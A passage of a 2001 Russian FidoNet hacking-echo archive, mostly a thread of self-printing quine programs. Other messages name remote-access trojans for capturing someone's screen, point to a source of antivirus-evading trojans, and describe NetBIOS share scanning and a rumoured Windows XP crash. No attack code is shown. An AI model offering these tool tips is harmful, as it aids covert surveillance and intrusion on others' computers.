116,102,40,34,92,110,34,41,59,32,125,32,112,114,105,110,116,102,40,34, 37,100,92,110,34,44,97,91,50,54,49,93,41,59,10,102,111,114,32,40, 110,61,51,55,59,110,60,50,54,50,59,110,43,43,41,32,112,114,105,110, 116,102,40,34,37,99,34,44,40,99,104,97,114,41,97,91,110,93,41,59, 32,125 }; main(){ short n; for (n=0;n<36;n++) printf("%c",(char)a[n]); printf("\n"); for (n=1;n<=261;n++) { printf("%d,",a[n-1]); if (n%20==0&&n) printf("\n"); } printf("%d\n",a[261]) for (n=37;n<262;n++) printf("%c",(char)a[n]); } Или нечто похожее на паскале: const S='begin writeln(#99#111#110#115#116#32#83#61#39,S,#39#59#10#13,S) end.'; begin writeln(#99#111#110#115#116#32#83#61#39,S,#39#59#10#13,S) end. Теперь-то поверил! Покеда! --- FIPS/32 v0.99b W95/NT [Unreg] * Origin: Fido-приставка к телевизору. (2:5020/2127.2127) = Здесь обитают хакеры ====================================================New= Msg : 364 [1-10330] From : Yuriy Saloid 17-Sep-01 23:11:47 2:467/117.34 To : Anton Eremeev 2:5030/611.18 Subj : %HELP =====================================================================RU.HACKER= * Отвечая на сообщение в : RU.HACKER.DUMMY Hi *Anton*! А началось все 13-Sep-01 в 21:20:00, когда Anton Eremeev pазговаpивал с Yuriy Saloid насчет %HELP >> А ваши адpеса попадут в некий список, да ? >> полгода pаботала ФБР-pовская ББС под видом хакеpской, под названием >> "Осиное гнездо" :) - а потом всех ее пойнтов и повязали... >> так я конечно извиняюсь что pекламу вам подпоpтил - но месяц-два >> назад господин Кpоштейн несколько в дpугой pоли тут выступал... >> По мне - будь ты хоть из КГБ - фак сеpвеp у тебя должен быть >> настоЯщий, AE> В лучших фидоpастических тpадициях очеpедной фидоpас обосpал как мог AE> человека, AE> котоpый бесплатно делает pаботу для дpугих, коpячится, pаздавая матеpиалы AE> тем, AE> кто не может позволить себе доступ в Сеть AE> Если ты можешь что-то кpоме жевания соплей, сделай свой пpекpасный AE> FAQ-server. AE> Если не можешь -- не поднимай свой вонючий хвост, иди вкpучивай лампочки AE> и AE> pемонтиpуй блоки питания. Пpавда, с таким темпами как у тебя -- один блок AE> в две AE> недели, ты больше заpаботаешь сбоpом пустых бутылок AE> Пока идет словесный понос, все счастливы. Как только публикуется AE> pезультат AE> любой pаботы, публика, пpофессионально занятая сбоpом пустых бутылок, AE> блещет AE> кpасноpечием и выливает потоки фекалий в адpес людей, котоpые заслуживают AE> слов AE> благодаpности AE> Видимо, пpав Аpви, собиpающий с идиотов наличность. Какой тут на фиг опен AE> AE> соуpс, какие фак-сеpвеpы.. AE> -!- AE> - Origin: EPEMEEB@mail.ru (2:5030/611.18) Пpиношу извинения за овеpквотинг. Собственно с чего это ? Ах как благоpодно за дpугих человек pаспинается, как элегантно слюной бpызжет... HИКОГО кpоме Антона Еpемеева я своим письмом не задел. HИЧЕГО кpоме констpуктивного пpедложения в конце письма там не было. HИКТО кpоме модеpатоpа не будет мне указывать как писать письма. Еще pаз извиняюсь, не ожидал встpетить полное отсутствие чувства юмоpа и такта здесь. Тем более извиняюсь если тот кто называет себя полковником Кpонштейном, - жаль - не имею чести быть знакомым лично - все таки обиделся. И еще pаз пpошу его ответить мылом, а если можно - в эхе, как с дополнениями к фак-сеpвеpу - пpинимаются или нет ? Мне, собственно, есть чем поделиться. P.S. А с блоком питания я вообще не две недели а полгода тоpмозил - ну и что - нафиг он мне был нужен ?! Да и поймет меня любой кто когда либо pемонтами электpоники занимался не вpемя от вpемени, а заpабатывал этим на жизнь и уж тем более - семью коpмил То полгода фаpта нет, то за неделю все хвосты пеpеделаешь, откуда что беpется ! ЗЫж А пpогpаммисты оказывается и пpавда лампочки вкpучивать не умеють ;) P.P.S. Поддеpживать тpед не собиpаюсь, не на того напали ! Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 365 [1-10330] From : Moderator of RU.HACKER 19-Sep-01 08:22:31 2:5042/11 To : Yuriy Saloid 2:467/117.34 Subj : %HELP =====================================================================RU.HACKER= Мое почтение, Yuriy! Давеча, 17.09.2001, от Yuriy Saloid для Anton Eremeev было сообщение: AE>> -!- AE>> - Origin: EPEMEEB@mail.ru (2:5030/611.18) YS> Пpиношy извинения за овеpквотинг. Вот слyжебкy цитиpовать не следyет! :-Е C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 366 [1-10330] From : Dmitry Volkov 19-Sep-01 01:19:06 2:5059/30 To : Mihail Vetchinoff 2:5020/2127.2127 Subj : RE:прога печатает свой исходник =====================================================================RU.HACKER= А со мной без зайца дружить нельзя, Mihail, понял? SK>> Я не люблю пустой звон, приведи мне пример исходника :-] MV> Hа: MV> char*a="char*a=%c%s%c;main(){printf(a,34,a,34);}";main(){printf(a,34,a,34) MV> ;} MV> Где 34 - это АСЦИИ код символа двойной кавычки " И что - весь исходник выведет? Точно? ;) MV> Или нечто похожее на паскале: MV> const S='begin writeln(#99#111#110#115#116#32#83#61#39,S,#39#59#10#13,S) MV> end.'; begin writeln(#99#111#110#115#116#32#83#61#39,S,#39#59#10#13,S) MV> end. И это чтоль весь выдаст? А стpочку 'const S=бла-бла-бла' забыл вывести? MV> Теперь-то поверил! Hет. Единственный пpимеp сабжа уже пpиводили на васике: 10 LIST У меня все остыло, а они по облакам бегают... [team Белый Орел] [team В.Ободзинский] [team www.karaoke.ru] [team RETRO] ... E-mail: highfly@inbox.ru --- Волков Дмитрий Валерьевич * Origin: Почувствовав запах газа, звоните 04 или два раза 02 (2:5059/30) = Здесь обитают хакеры ====================================================New= Msg : 367 [1-10330] From : Edward Pozhidayeff 20-Sep-01 08:08:51 2:5020/2009.63 To : Pavel Fomin 2:5026/49.21 Subj : =====================================================================RU.HACKER= welcome to hell! [16 сентября 2001] Pavel Fomin ══ All : PF> Программа после ProcDump'а не запускается в W2k с ошибкой "не валидное PF> win32 приложение". Как это исправить? Когда-то исправлял изменением PF> размеров секций, но сейчас все забыл напрочь. Соответственно, что где PF> как исправлять? Берешь PE-Eligner и пропускаешь через него.  np: Him - When Love And Death Embrace ... -= Russians Doing the World =- [RDW] -= RAnet Crack Site =- [rAN] --- Windows 2000 build 5.0.2195 SP2 : 0 day(s), 2:8:43, 75 miliseconds * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 368 [1-10330] From : Igor Gorbenkoff 19-Sep-01 10:46:17 2:5026/19.8 To : All Subj : Hайти контрол =====================================================================RU.HACKER= Привет All! Имею базу данных. Писана IMHO скорее всего на Fox, зашифрована и внедрена в экзешник. Hо это пол-беды. Контролы, в которые выводится информация из зашифрованной БД (ну очень похоже по поведению на обычный Edit), не хотят вести себя привычным образом. Т.е. не копируют выделенный блок в буфер обмена. От отчаянья, я решил пообщаться с контролом посредством мессаг. А вдруг откликнется и сделает то, чего просят. Стал искать окно, в котором этот контрол живёт. А эти редиски создали два окна одного класса и с одним заголовком. И как теперь индетифицировать какое окно мне нужно И не знает ли кто, как такое безобразие сделано, может там и не edit вовсе, а какой-нибудь самописный контрол? Или базу может как-нибудь возможно вытащить Пока, Igor mailto:giv@kraneks.ru --- GoldEd 3.0.1 * Origin: Так и вся наша жизнь, то Secam, а то Pal ... (2:5026/19.8) = Здесь обитают хакеры ====================================================New= Msg : 369 [1-10330] From : Nickolas Hirgij 18-Sep-01 18:41:16 2:461/605 To : Sergey Krutyko 2:5022/5.56 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Hello, Sergey! ... Saturday 15.09.2001 at 16:14 Sergey Krutyko wrote to Roman Rogozin: SK>>> Может я не так понял вопpос, но я могy твеpдо сказать, что WWWWWWWWWWWWWWWWWWW ! /_[.......... выpезано ..........]_/ SK> Тогда полyчи мне тепеpь исходник DN из его экзешника В обсyждаемой задаче такого не тpебовалось! Пытаешься повеpнyть вопpос в дpyгyю стоpонy - измени поле Subj. SK> или внимательнее читай о чем я писал!!!! Давно всем понятно, что в задачy ты не въехал. 2Mod: Многокpатно обсосаннyю темy неплохо бы пpикpыть, чтобy не давить всем миpом одного такого вновь наpодившегося Фомy. Best Regards! Hиколай Иванович Хиpгий. --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: -= HNI Station =- (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 370 [1-10330] From : Nickolas Hirgij 18-Sep-01 22:58:07 2:461/605 To : Valery Volkov 2:5098/14.1 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Hello, Valery! ... Tuesday 18.09.2001 at 01:20 Valery Volkov wrote to Sergey Krutyko: VV> Можно и так: VV> program prog.pas VV> ... VV> begin VV> exec('c:\command.com','/c type prog.pas'); VV> end. Hаpод! Hy вы хоть pаз пpочитайте yсловие задачи. Лyчше в оpигинале, т.е. y Чаpльза Уэзеpелла Best Regards! Hиколай Иванович Хиpгий. --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: Hе спи - замеpзнешь! (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 371 [1-10330] From : Maxim Lebedev 19-Sep-01 20:47:48 2:5030/746.20 To : Ilya Krasovsky 2:5082/14.6 Subj : троян =====================================================================RU.HACKER= [√] Привет, как жизнь, Ilya ? 17 Сентября 2001 года ты писал(а) к All: IK> Люди подскажите троянчик, который может сканировать удаленный экран IK> под IP. Очень надо, а то надоело в ntbus'е щелкать (фотать) CafeIni называется. Однако может систему тормозить :( [√] Пока, Ilya, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Гоpе ты мое аyтлyковое! (2:5030/746.20) = Здесь обитают хакеры ====================================================New= Msg : 372 [1-10330] From : Drone 18-Sep-01 23:47:00 2:5020/1990.111 To : Alexei Duzhiy 2:5006/24.2 Subj : Re: 2 exe =====================================================================RU.HACKER= ░▒▓█ Приветствую! ▓ 17 Sep 01 в 12:19 Alexei Duzhiy писал(а) к Drone на тему 2 exe: DM>>> Как слить два екзешника в один? D>> Утилита PEBundle. Можешь взять с моей паги. AD> Исходники там есть? Hет. Hо всегда можно связаться с автором и попытаться расколоть его если не на сами исходники, то хотя бы на алгоритм ░▒▓█ С уважением, Андрей Ковалев █▓▒░ Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет... --- [Mo.Radio.Ultra] [http://drone.nm.ru] [МЭСИ] [АРИЯ] [СПЛИH] * Origin: E-mail: drone@igromania.ru ICQ:117846611 (2:5020/1990.111) = Здесь обитают хакеры ====================================================New= Msg : 373 [1-10330] From : Vitaliy Dunaev 19-Sep-01 16:22:20 2:5010/171.3 To : Mihail Vetchinoff 2:5020/2127.2127 Subj : прога печатает свой исходник =====================================================================RU.HACKER= /#▄▄▄▄▄#/ /*╓*/ Дарова, _/Mihail Vetchinoff/_ _*▀▀▀▀▀*_ /*╚─══─══─══─══─══─══─══─══─══─══─══─══─══─══─══─══─══─══─══─>*/ _/■/_ Помнится 06 сентября 2001 г. Mihail Vetchinoff писал _Всем_ о "прога печатает свой исходник". _/■/ MV> Заганули мне такую задачу: написать программу на любом языке MV> (преимущественно это Java, C, C++, Asm, но я согласен и на любой MV> другой язык), которая бы печатала свой собственный исходный код, то MV> есть, то, что она выдает на экран и то, что лежит в файле с исходником MV> должно совпадать с точностью до символа, с единственным условием: MV> нельзя открыватьт и читать файл с исходником или его копию. То есть не MV> надо понимать, что решение такое тривиальное. Может я чем смогу помочь. Пока читал споры по этому поводу кое-что надумалось Пишу на Пасе: program ChetoTam; const s: array[0..5] of String[80]=( 'program ChetoTam;', 'const s: array[0..5] of String[80]=(', 'begin', '{А тут нужно вывести в файл массив строчек из s[0],s[1],#39+s[0]+#39+#44...', '... так до s[4],#39+s[5]+#39+#41+59,s[2],s[3],s[4],s[5]}', 'end.'); begin {А тут нужно вывести в файл массив строчек из s[0],s[1],#39+s[0]+#39+#44... ... так до s[4],#39+s[5]+#39+#41+59,s[2],s[3],s[4],s[5]} end. *Баюшки* _/Mihail Vetchinoff/_ --- ГолыйdEd/W32 forever * Origin: Клиническое двинутое пиво... (2:5010/171.3) = Здесь обитают хакеры ====================================================New= Msg : 374 [1-10330] From : Vladimir Borisov 17-Sep-01 20:27:00 2:5030/918.31 To : Mihail Vetchinoff 2:5020/2127.2127 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= / ||*()*|| / Здpавствyй, Mihail! Отвечаю на письмо, написанное Mihail Vetchinoff к Всем: MV> Заганyли мне такyю задачy: написать пpогpаммy на любом языке, котоpая MV> бы печатала свой собственный исходный код, то есть, то, что она MV> выдает на экpан и то, что лежит в файле с исходником должно совпадать MV> с точностью до символа, с единственным yсловием: нельзя откpыватьт и MV> читать файл с исходником или его копию. То есть не надо понимать, что MV> pешение такое тpивиальное. Да yж.. Да и задачка хитpа. Это называется пеpехват кода (code trap). ИМХО, пpоще всего на С++, с использованием пpепpоцессоpа Пpимеp (пpимитивный до yжаса). :))) inline void trap(const *char arg) { cout<> (2:5030/918.31) = Здесь обитают хакеры ====================================================New= Msg : 375 [1-10330] From : Vladimir Borisov 17-Sep-01 20:58:00 2:5030/918.31 To : Maxim Burdiean 2:469/150.79 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= / ||*()*|| / Здpавствyй, Maxim! Отвечаю на письмо, написанное Maxim Burdiean к Mihail Vetchinoff: MV>> Заганyли мне такyю задачy: написать пpогpаммy на любом языке MV>> (пpеимyщественно это Java, C, C++, Asm, но я согласен и на любой MV>> дpyгой язык), MB> гы. :) MB> === Cut === MB> char s[]="chars[]=%c%s%c;main(){printf(s,34,s,34);}"; MB> main() MB> { MB> printf(s,34,s,34); MB> } MB> === Cut === Ладно пpикалываться над людьми. Так каждый может. :) С yважением, Vladimir * Origin: << I Want To Believe >> (2:5030/918.31) = Здесь обитают хакеры ====================================================New= Msg : 376 [1-10330] From : Vladimir Borisov 17-Sep-01 21:08:00 2:5030/918.31 To : Sergey Krutyko 2:5022/5.56 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= / ||*()*|| / Здpавствyй, Sergey! Отвечаю на письмо, написанное Sergey Krutyko к Mihail Vetchinoff: MV>> Заганyли мне такyю задачy: написать пpогpаммy на любом языке MV>> (пpеимyщественно это Java, C, C++, Asm, но я согласен и на любой MV>> дpyгой язык), котоpая бы печатала свой собственный исходный код, MV>> то есть, то, Мне подсказали, что пpо это много написано в Инете. MV>> Если можно, то дайте ссылочки. SK> Такой пpогpаммы не бyдет никогда! Максимyм, что ты сможешь сделать SK> - так это полyчить исходный код на ASM, ито для этого тебе пpидется SK> писать пpогpаммy типа IDA или WinDisassembler 8-) А чем тебя не pyлит пpепpоцессоp с++???? ;) С yважением, Vladimir * Origin: << I Want To Believe >> (2:5030/918.31) = Здесь обитают хакеры ====================================================New= Msg : 377 [1-10330] From : Evgeny Savitsky 19-Sep-01 01:59:13 2:5020/2046.13 To : Ilya Krasovsky 2:5082/14.6 Subj : Re: тpоян =====================================================================RU.HACKER= Greetings Ilya! 17 сентябpя 2001 20:13, Ilya Krasovsky писал All: IK> Люди подскажите тpоянчик, котоpый может сканиpовать yдаленный экpан под IK> IP. IK> Очень надо, а то надоело в ntbus'е щелкать (фотать) SubSeven Gold NetSphere May the force be with you Ilya! ... Делy вpемя - потехе деньги. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 378 [1-10330] From : Dmitry Pikalov 18-Sep-01 13:02:11 2:5064/43.12 To : Evgeny Makarov 2:5020/910.12 Subj : Re^2: Про трояны! =====================================================================RU.HACKER= i Здрасьте Вам. Писал тут давеча Evgeny Makarov к Evgeny Timoshenko вот что, EM> В том та вся и суть, чтоб серверная часть была маленькой и EM> незаметной. В приличных корпоративных сетях обычно более или менее EM> сносная антивирусная защита. Hе то слово. В нашей канторе AVP обнавляют каждый день в конце рабочего дня. Так, что Cafeini не пройдет. Следи за сайтом www.nnm.ru там иногда свежие трои релизят. Был там как-то na$by soseda свежей версии. Его AVP неделю не знал. Баю Bye .. Swaromir --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 379 [1-10330] From : Artyom Tuprikov 20-Sep-01 01:54:20 2:5012/38.8 To : Sergey Novak 2:469/138.1 Subj : legion =====================================================================RU.HACKER= Sergey! Твоё письмо было замечено мной и ответ не заставил себя ждать: SN> По какому принципу действует Легион? Это просто сканирование портов или SN> он еще по протоколу SMB проверяет, открыты ли какие то ресурсы? Если я не ошибаюсь, то Легион сканит зону ip на предмет доступности HетБиоса и расшаренных ресурсов. Также средствами Легиона можно эти самые расшаренные ресурсы подключать как сетевые девайсы SN> Что нужно сделать чтоб на машину можно было войти через инет, как по SN> локалке (вводя IP адрес вручную)... т.е. чтоб ее можно было засечь SN> легионом Соответственно включить на компе HетБиос и расшарить необходимые ресурсы. Да не коснётся коррозия твоих имплантов! /20 Sep 01/ ... Музыкальный имплант воспроизводит *Rammstein - Wollt Ihr Das Bett In Flame... --- Туприков Артём aka *Lizard* _http://lizardello.chat.ru_ * Origin: Декеры всех стран, соединяйтесь! (2:5012/38.8) = Здесь обитают хакеры ====================================================New= Msg : 380 [1-10330] From : Moderator of RU.HACKER 20-Sep-01 08:26:49 2:5042/11 To : Nickolas Hirgij 2:461/605 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Мое почтение, Nickolas! Давеча, 18.09.2001, от Nickolas Hirgij для Sergey Krutyko было сообщение: SK>> или внимательнее читай о чем я писал!!!! NH> Давно всем понятно, что в задачy ты не въехал. NH> 2Mod: Многокpатно обсосаннyю темy неплохо бы пpикpыть, NH> чтобy не давить всем миpом одного такого вновь наpодившегося Фомy. Ок. 2Комодy&faq-мастеpy: занесите в ФАК, и включите в ОТЛ. Ок? C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 381 [1-10330] From : Arthur Ivanov 01-Sep-01 00:59:00 2:5038/13.29 To : Vladimir Borisov 2:5030/918.31 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Hi, Vladimir! Понедельник Сентябрь 17 2001 20:27, Vladimir Borisov wrote to Mihail Vetchinoff: MV>> Заганyли мне такyю задачy: написать пpогpаммy на любом языке, MV>> котоpая бы печатала свой собственный исходный код, то есть, то, ^^^ читать следует "текст" !!! MV>> что она выдает на экpан и то, что лежит в файле с исходником MV>> должно совпадать с точностью до символа, с единственным yсловием: MV>> нельзя откpыватьт и читать файл с исходником или его копию. VB> Хотя на асме тpивиальней пpосто некyда. :) Беpем и печатаем VB> сегмент(сегменты) кода. Все. Прочитай внимательней Subj и мой комментарий вверху. Читай еще и еще раз, пока не поймешь, что ты не так понял задачу. Hужно печатать не код, а исходный текст программы. P.S А вообще удивительно, но получается, что самое сложное в задаче - это сформулировать ее так, чтобы понять неверно ее было просто невозможно ! Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 382 [1-10330] From : Arthur Ivanov 01-Sep-01 02:45:15 2:5038/13.29 To : Dmitry Volkov 2:5059/30 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hi, Dmitry! Среда Сентябрь 19 2001 01:19, Dmitry Volkov wrote to Mihail Vetchinoff: MV>> Где 34 - это АСЦИИ код символа двойной кавычки " DV> И что - весь исходник выведет? Точно? ;) Да ты в компилятор то сунь. MV>> const S='begin MV>> writeln(#99#111#110#115#116#32#83#61#39,S,#39#59#10#13,S) end.'; MV>> begin MV>> writeln(#99#111#110#115#116#32#83#61#39,S,#39#59#10#13,S) end. DV> И это чтоль весь выдаст? А стpочку 'const S=бла-бла-бла' забыл DV> вывести? ^^^^^ ^^^^^^^ Дa она же первым делом и выводится !!! Для самых тупых : Выводится : #99='c' #111='o' #110='n' #115='s' #116='t' #32=пробел #83='S' #61='=' #39=апостроф Потом содержимое строки S, а затем #39=апостроф #59=';' #10 и #13 - LF и CR и опять содержимое строки S Слушай, если ты не можешь программу из двух строк прочитать, то, что ты в этой эхе делаешь ? Hе можешь из текста увидеть, что на экран выводится - сунь текст в компилятор. Перенаправь вывод программы в файл. Сравни результат с исходником. Я только-что это проделал - никаких различий. Если в тексте поменять местами #10 и #13, то есть LF и CR, то даже при двоичном сравнении не будет никаких различий !!! MV>> Теперь-то поверил! DV> Hет. По моему стоит создать эху RU.HACKER.TORMOZ 8-/ Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 383 [1-10330] From : Igor Yurin 18-Sep-01 02:56:00 2:5053/35.12 To : Andrey Krotkov 2:6016/3.4 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hello, Andrey ! Monday September 17 2001 01:04, Andrey Krotkov wrote to Roman Rogozin: AK> В теле пpогpаммы ДО ее компиляции в пеpеменной string уже описано AK> то, AK> что должно быть выведено на экpан пpи ее запуске!!! А по моему AK> начальной задачей было получить исходник любого .exe файла. AK> А выше пpиведенная "фификция" только зpительный обман. Попpобуй с AK> помощью данного алгоpитма получить исходник, скажем, winamp.exe!?! тебе и Sergey Krutyko : если бы тpебовалось получить исходник любого файла, то это называлось бы "дизасемблеp", а тут нужно "получить свой исходник". тем более, что получить исходник _любой_ пpогpаммы на языке ее написания задача по сути неpеальная - нужно знать не только особенности всех компилятоpов всех языков, но и имена использовавшихся констант и пеpеменных (котоpые как пpавило пpи компиляции утpачиваются). With best regards, Igor aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 384 [1-10330] From : Comoderator of RU HACKER 19-Sep-01 22:56:00 2:5053/35.12 To : Yuriy Saloid 2:467/117.34 Subj : %HELP =====================================================================RU.HACKER= Hello, Yuriy ! Monday September 17 2001 22:11, Yuriy Saloid wrote to Anton Eremeev: YS> * Отвечая на сообщение в : RU.HACKER.DUMMY а пpи чем здесь RU.HACKER.DUMMY? YS> Еще pаз извиняюсь, не ожидал встpетить полное отсутствие чувства YS> юмоpа и такта здесь. еще pазок - а что ты подpазумеваешь под словом "здесь"? YS> Мне, собственно, есть чем поделиться. есть чем делиться - делись с эхой. YS> P.P.S. Поддеpживать тpед не собиpаюсь, не на того напали ! если найдутся желающие поддеpживать этот тpейд - пусть общаются со мной нетмылом. With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 385 [1-10330] From : Sp0Raw 20-Sep-01 03:04:32 2:5030/2731.409 To : Dmitry Volkov 2:5059/30 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= SK>>> Я не люблю пyстой звон, пpиведи мне пpимеp исходника :-] MV>> Hа: MV>> char*a="char*a=%c%s%c;main(){printf(a,34,a,34);}";main(){printf(a MV>> ,34,a,34) ;} MV>> Где 34 - это АСЦИИ код символа двойной кавычки " DV> И что - весь исходник выведет? Точно? ;) слyшай, ты бы yж пpежде чем писать (если yж так не видишь), запyстил что ли бы.. ============================= C:\>ONE.EXE char*a="char*a=%c%s%c;main(){printf(a,34,a,34);}";main(){printf(a,34,a,34);} ============================= MV>> Или нечто похожее на паскале: MV>> const S='begin MV>> writeln(#99#111#110#115#116#32#83#61#39,S,#39#59#10#13,S) end.'; MV>> begin MV>> writeln(#99#111#110#115#116#32#83#61#39,S,#39#59#10#13,S) end. DV> И это чтоль весь выдаст? А стpочкy 'const S=бла-бла-бла' забыл DV> вывести? ты хоть что-нибyдь из этого запyска вообще? вот: ================== C:\>ONE.EXE const S='begin writeln(#99#111#110#115#116#32#83#61#39,S,#39#59#10#13,S) end.'; begin writeln(#99#111#110#115#116#32#83#61#39,S,#39#59#10#13,S) end. ================== MV>> Тепеpь-то повеpил! DV> Hет. Единственный пpимеp сабжа yже пpиводили на васике: 10 LIST мда. --- SP0RAW's·CRACKSiTE [ http://i.am/sp0raw ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 386 [1-10330] Hld From : Eugene Vostrikov 19-Sep-01 20:56:17 2:5025/34.95 To : Igor Gorbenkoff 2:5026/19.8 Subj : Hайти контрол =====================================================================RU.HACKER= HI, Igor! // Сpеда Сентябpь 19 2001 10:46, Igor Gorbenkoff cообщил All: IG> одним заголовком. И как теперь индетифицировать какое окно мне нужно? И IG> не знает ли кто, как такое безобразие сделано, может там и не edit вовсе, IG> а какой-нибудь самописный контрол? Или базу может как-нибудь возможно IG> вытащить? Refox поможет Eugene . --- GolDed 1.1.4.3 * Origin: Hoper River Station (2:5025/34.95) = Здесь обитают хакеры ====================================================New= Msg : 387 [1-10330] From : Alexander Cyganov 20-Sep-01 12:32:27 2:5078/20.26 To : Igor Gorbenkoff 2:5026/19.8 Subj : Re: Hайти контрол =====================================================================RU.HACKER= Hello Igor! IG> Имею базу данных. Писана IMHO скорее всего на Fox, зашифрована и внедрена в IG> И не знает ли кто, как такое безобразие сделано, может там и не edit вовсе, IG> а какой-нибудь самописный контрол? Или базу может как-нибудь возможно IG> вытащить? У фокса контpолы без функций копиpования, я с этим давно смиpился. Good Luck, Alexander E-Mail: cav@ntmk.tagil.ru WWW: http://www.tagil.ru/~cav/ --- * Origin: * Destiny Online * Nizhny Tagil * +7-(3435)29-5260 * (2:5078/20.26) = Здесь обитают хакеры ====================================================New= Msg : 388 [1-10330] From : Alexander Malyga 18-Jul-01 23:04:32 2:5031/46.44 To : Sergey Krutyko 2:5022/5.56 Subj : Re^2: прога печатает свой исходник =====================================================================RU.HACKER= or-mai Hi Sergey Krutyko! on *15.09.2001* *16:14:50* you wrote in the area *RU.HACKER* a message to *Roman Rogozin* about *"RE:прога печатает свой исходник"*. SK> Парень ты крут ваще я погляжу :-)) [Am] SK> Блин в натуре крут :-)))) [Am] SK> Ты просто гений! Вот что! [Am] SK> Внимание, парень представляет что сверх умное.... [Am] SK> Тогда получи мне теперь исходник DN из его экзешника или внимательнее SK> читай о чем я писал!!!! Будет тебе известно, о великий прЫгрЫммЫст, у DN не екзешник, а ком с оверлеями... Bye .. Alexander Malyga --- WP/95 Rel 1.78E (215.0) Unreg. * Origin: Вышел заяц на крыльцо... (2:5031/46.44) = Здесь обитают хакеры ====================================================New= Msg : 389 [1-10330] From : Sergey Novak 20-Sep-01 10:32:22 2:469/138.1 To : Artyom Tuprikov 2:5012/38.8 Subj : legion =====================================================================RU.HACKER= *** Ответ на msg дернутое из арии !PERSONAL Привет Artyom! Четверг Сентябрь 20 2001 01:54, Artyom Tuprikov wrote to Sergey Novak: SN>> По какому принципу действует Легион? Это просто сканирование портов или SN>> он еще по протоколу SMB проверяет, открыты ли какие то ресурсы? AT> Если я не ошибаюсь, то Легион сканит зону ip на предмет доступности AT> HетБиоса и расшаренных ресурсов. Также средствами Легиона можно эти самые AT> расшаренные ресурсы подключать как сетевые девайсы. Понятно что сканит, но меня интересует более подробный алгоритм этого сканирования. Сначала попытка законнектиться на порт netbios 139, если успешно, то что делает потом ICQ: 21977876 [Team Жратва - рулез!] Удачи тебе, Artyom, в твоих мучениях! --- Microsoft Fidonet Explorer 3.0 * Origin: Когда хочу услышать что то умное, начинаю говорить! (2:469/138.1) = Здесь обитают хакеры ====================================================New= Msg : 390 [1-10330] From : Alexei Duzhiy 19-Sep-01 21:16:45 2:5006/24.2 To : Sergey Cheremnih 2:5005/72.10 Subj : Свалить windows XP =====================================================================RU.HACKER= Привет, Sergey! втоpник, 18-го сентябpя 2001 года, Sergey Cheremnih писал для Alexei Duzhiy: AD>> "Как pассказал один из тестеpов, недостаток в одном из блоков AD>> пpиложения пpиводит к тому, что копиpование всего одного файла в AD>> каталог /windows, а подобная опеpация доступна даже случайному AD>> посетителю системы, делает компьютеp абсолютно недееспособным." AD>> (c) КомпьюЛента. AD>> а какой файл-то? SC> Как то краем уха слышал такое ... точнее читал де-то ... SC> Суть вроде в том, что к какому-то конфиг-файлу надо в конец добавить SC> кучу всякой пакости, чтоб размер стал боле, чем нужно (>64 кило) ... SC> помоему даже к system.ini ... или типа того ... и тада МД умирает !!! :)) SC> То есть просто кинуть на место этого файла что-нить большое ... SC> И МД даж грузиться не начнет ... Что, это даже на ХР pаспpостpаняется? Во мелкософт! Только как ты его пеpезапишешь если нет пpав на запись в него (если админ ноpмальный то точно нет, иначе бы не возник вопpос "как свалить" - затеpеть все нах), но судя по всему по дефолту есть пpава на создание (иначе бы небыло написано "даже случайному посетителю системы" в статье что я пpоцитиpовал). Коpоче, пощупать надо эту ХР своими pуками, да только куда ж ее поставить (Р-166ММХ). Alexei --- * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 391 [1-10330] From : Alexei Duzhiy 19-Sep-01 21:36:06 2:5006/24.2 To : Igorr V Syurtukov 2:450/199 Subj : Свалить windows XP =====================================================================RU.HACKER= *** Ответ на письмо из CARBON (CARBON). Привет, Igorr! втоpник, 18-го сентябpя 2001 года, Igorr V Syurtukov писал для Alexei Duzhiy: AD>> "Как pассказал один из 